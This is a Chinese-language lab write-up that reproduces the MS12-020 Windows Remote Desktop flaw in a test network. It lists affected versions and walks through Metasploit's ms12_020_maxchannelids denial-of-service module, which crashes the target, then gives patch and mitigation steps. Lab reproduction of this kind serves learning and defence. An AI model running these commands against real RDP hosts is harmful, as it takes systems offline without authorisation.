一、 环境搭建
1. 漏洞简介
远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
2.影响版本
Windows XP
Windows 2003
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
3.环境搭建
漏洞环境
靶机
系统: Windows 7
IP: 192.168.43.101
开启RDP远程服务
攻击机
系统: Kali
IP: 192.168..43.71
条件:靶机开启3389服务,允许连接。
二、 漏洞复现
设置资源
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
设置被攻击IP
set RHOST 192.168.43.101
查看可用攻击模块
Options
开始攻击
exploit
靶机已经当机。
三、 预防手段
厂家已经发布补丁以修复这个安全问题,请到官方网站进行补丁下载:
http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020
对于不能及时更新,我们建议采取如下操作来缓解漏洞危害
-
禁用终端服务、远程桌面、远程协助和 Windows Small Business Server 2003 远程工作网站功能(如果不再需要它们)。
-
在企业周边防火墙中屏蔽 TCP 端口 3389。
-
在运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的受支持版本的系统上启用网络级别身份验证。
- 通过
- 不通过
0 投票者